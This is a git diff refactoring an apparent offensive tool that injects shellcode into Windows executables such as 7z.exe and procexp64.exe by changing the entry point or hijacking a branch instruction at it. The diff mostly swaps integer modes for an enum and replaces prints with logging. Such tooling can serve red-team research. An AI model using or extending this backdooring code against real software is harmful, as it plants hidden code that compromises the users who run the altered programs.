diff --git a/app/views.py b/app/views.py index 06f3637..b1281df 100644 --- a/app/views.py +++ b/app/views.py @@ -48,11 +48,7 @@ def inject(): settings.exec_style = ExecStyle[exec_style] inject_style = request.form['inject_style'] - inject_style = InjectStyle[inject_style] - if inject_style == InjectStyle.ENTRY: - settings.inject_mode = 1 - elif inject_style == InjectStyle.HIJACK: - settings.inject_mode = 2 + settings.inject_style = InjectStyle[inject_style] print(str(settings)) start(settings) diff --git a/derbackdoorer/derbackdoorer.py b/derbackdoorer/derbackdoorer.py index 8eb32e6..2153663 100644 --- a/derbackdoorer/derbackdoorer.py +++ b/derbackdoorer/derbackdoorer.py @@ -13,21 +13,16 @@ import logging from helper import hexdump from derbackdoorer.mype import MyPe +from model.defs import * logger = logging.getLogger("DerBackdoorer") class PeBackdoor: - class SupportedRunModes(IntEnum): - ModifyOEP = 1 - BackdoorEP = 2 - HijackExport = 4 - - - def __init__(self, mype: MyPe, main_shc, inject_mode): + def __init__(self, mype: MyPe, main_shc: bytes, inject_mode: InjectStyle): self.mype: MyPe = mype - self.runMode = inject_mode - self.shellcodeData = main_shc + self.runMode: InjectStyle = inject_mode + self.shellcodeData: bytes = main_shc # Working self.shellcodeOffset: int = 0 # from start of the file @@ -77,22 +72,22 @@ Trailing {sect_name} bytes: def setupShellcodeEntryPoint(self): - if self.runMode == int(PeBackdoor.SupportedRunModes.ModifyOEP): + if self.runMode == InjectStyle.ChangeEntryPoint: rva = self.mype.pe.get_rva_from_offset(self.shellcodeOffset) self.mype.set_entrypoint(rva) logger.info(f'Address Of Entry Point changed to: RVA 0x{rva:x}') return True - elif self.runMode == int(PeBackdoor.SupportedRunModes.BackdoorEP): + elif self.runMode == InjectStyle.BackdoorCallInstr: return self.backdoorEntryPoint() - elif self.runMode == int(PeBackdoor.SupportedRunModes.HijackExport): - addr = self.getExportEntryPoint() - if addr == -1: - logger.critical('Could not find any export entry point to hijack! Specify existing DLL Exported function with -e/--export!') - - return self.backdoorEntryPoint(addr) + #elif self.runMode == int(PeBackdoor.SupportedRunModes.HijackExport): + # addr = self.getExportEntryPoint() + # if addr == -1: + # logger.critical('Could not find any export entry point to hijack! Specify existing DLL Exported function with -e/--export!') + # + # return self.backdoorEntryPoint(addr) return False @@ -250,7 +245,7 @@ Trailing {sect_name} bytes: self.compiledTrampoline = encoding self.compiledTrampolineCount = count - logger.info('Successfully backdoored entry point with jump/call to shellcode.\n') + logger.info('Successfully backdoored entry point with jump/call to shellcode') return instr.address return 0 diff --git a/derbackdoorer/mype.py b/derbackdoorer/mype.py index b5b756b..133ab13 100644 --- a/derbackdoorer/mype.py +++ b/derbackdoorer/mype.py @@ -56,13 +56,11 @@ class MyPe(): def get_code_section_data(self) -> bytes: sect = self.get_code_section() - print("CODE GET: {}".format(len(sect.get_data()))) return bytes(sect.get_data()) def write_code_section_data(self, data: bytes): sect = self.get_code_section() - print("CODE SET {} {}".format(len(data), sect.PointerToRawData)) self.pe.set_bytes_at_offset(sect.PointerToRawData, data) diff --git a/model/defs.py b/model/defs.py index c1f7ffe..8ca31b2 100644 --- a/model/defs.py +++ b/model/defs.py @@ -27,9 +27,10 @@ class ExecStyle(Enum): class DataRefStyle(Enum): APPEND = 1 + class InjectStyle(Enum): - ENTRY = "change AddressOfEntryPoint" - HIJACK = "hijack branching instruction at Original Entry Point (jmp, call, ...)" + ChangeEntryPoint = "change AddressOfEntryPoint" + BackdoorCallInstr = "hijack branching instruction at Original Entry Point (jmp, call, ...)" class SourceStyle(Enum): peb_walk = "peb_walk" diff --git a/model/settings.py b/model/settings.py index 9ba8a6e..f4c72da 100644 --- a/model/settings.py +++ b/model/settings.py @@ -14,7 +14,7 @@ class Settings(): self.short_call_patching: bool = False # Injectable - self.inject_mode: int = 2 + self.inject_mode: InjectStyle = InjectStyle.BackdoorCallInstr self.inject_exe_in: FilePath = "" self.inject_exe_out: FilePath = "" diff --git a/phases/injector.py b/phases/injector.py index bc51a76..e225684 100644 --- a/phases/injector.py +++ b/phases/injector.py @@ -26,8 +26,8 @@ def inject_exe( shellcode_in = project.payload.payload_path exe_in = settings.inject_exe_in exe_out = settings.inject_exe_out - inject_mode = settings.inject_mode - source_style = settings.source_style + inject_mode: InjectStyle = settings.inject_mode + source_style: SourceStyle = settings.source_style logger.info("--[ Injecting: {} into: {} -> {} (mode: {})".format( shellcode_in, exe_in, exe_out, inject_mode @@ -92,7 +92,7 @@ def injected_fix_iat(mype: MyPe, carrier: Carrier, exe_host: ExeHost): offset_from_code = code.index(iatRequest.placeholder) instruction_virtual_address = offset_from_code + exe_host.image_base + exe_host.code_virtaddr logger.info(" Replace {} at VA 0x{:x} with call to IAT at VA 0x{:x}".format( - iatRequest.placeholder, instruction_virtual_address, destination_virtual_address + iatRequest.placeholder.hex(), instruction_virtual_address, destination_virtual_address )) jmp = assemble_and_disassemble_jump( instruction_virtual_address, destination_virtual_address @@ -124,7 +124,6 @@ def injected_fix_data(mype: MyPe, carrier: Carrier, exe_host: ExeHost): # patch code section # replace the placeholder with a LEA instruction to the data we written above code = mype.get_code_section_data() - print("Type of code: ", type(code)) for datareuse_fixup in reusedata_fixups: if not datareuse_fixup.randbytes in code: raise Exception("DataResuse: ID {} not found, abort".format( diff --git a/phases/masmshc.py b/phases/masmshc.py index 8a7c957..42d2549 100644 --- a/phases/masmshc.py +++ b/phases/masmshc.py @@ -1,9 +1,12 @@ import re import os +import logging + +logger = logging.getLogger("masmshc") -VERSION = "0.3" g_is32bit = False + class Params: def __init__(self, infile, outfile, inline_strings, remove_crt, append_rsp_stub): self.infile = infile @@ -116,10 +119,10 @@ def process_file(params): # ofile.write("\tjmp\tmain\n") elif params.append_rsp_stub: append_align_rsp(ofile) - print("[INFO] Entry Point: AlignRSP") + logger.debug("[INFO] Entry Point: AlignRSP") if seg_name == "_BSS": - print(f"[ERROR] Line {line_count + 1}: _BSS segment detected! Remove all global and static variables!\n") + logger.error(f"[ERROR] Line {line_count + 1}: _BSS segment detected! Remove all global and static variables!\n") if seg_name in ("pdata", "xdata", "voltbl"): in_skipped = True diff --git a/supermega.py b/supermega.py index d9e4ae3..5a63fbe 100644 --- a/supermega.py +++ b/supermega.py @@ -58,17 +58,17 @@ def main(): if args.verify == "peb": settings.source_style = SourceStyle.peb_walk - settings.inject_mode = 2 + settings.inject_mode = InjectStyle.BackdoorCallInstr settings.inject_exe_in = "exes/7z.exe" settings.inject_exe_out = "out/7z-verify.exe" elif args.verify == "iat": settings.source_style = SourceStyle.iat_reuse - settings.inject_mode = 2 + settings.inject_mode = InjectStyle.BackdoorCallInstr settings.inject_exe_in = "exes/procexp64.exe" settings.inject_exe_out = "out/procexp64-verify.exe" elif args.verify == "rwx": settings.source_style = SourceStyle.peb_walk - settings.inject_mode = 1 # ,2 is broken atm + settings.inject_mode = InjectStyle.ChangeEntryPoint # ,2 is broken atm settings.inject_exe_in = "exes/wifiinfoview.exe" settings.inject_exe_out = "out/wifiinfoview.exe-verify.exe" else: @@ -101,12 +101,14 @@ def main(): if args.exec == "direct_1": settings.exec_style = ExecStyle.CALL - if args.rbrunmode: - if args.rbrunmode == "1" or args.rbrunmode == "2": - settings.inject_mode = int(args.rbrunmode) + if args.inject: + if args.rbrunmode == "eop": + settings.inject_mode = InjectStyle.ChangeEntryPoint + elif args.rbrunmode == "backdoor": + settings.inject_mode = InjectStyle.BackdoorCallInstr else: logging.error("Invalid mode, use one of:") - for i in ["1", "2"]: + for i in ["eop", "backdoor"]: logging.error(" {} {}".format(i, rbrunmode_str(i))) return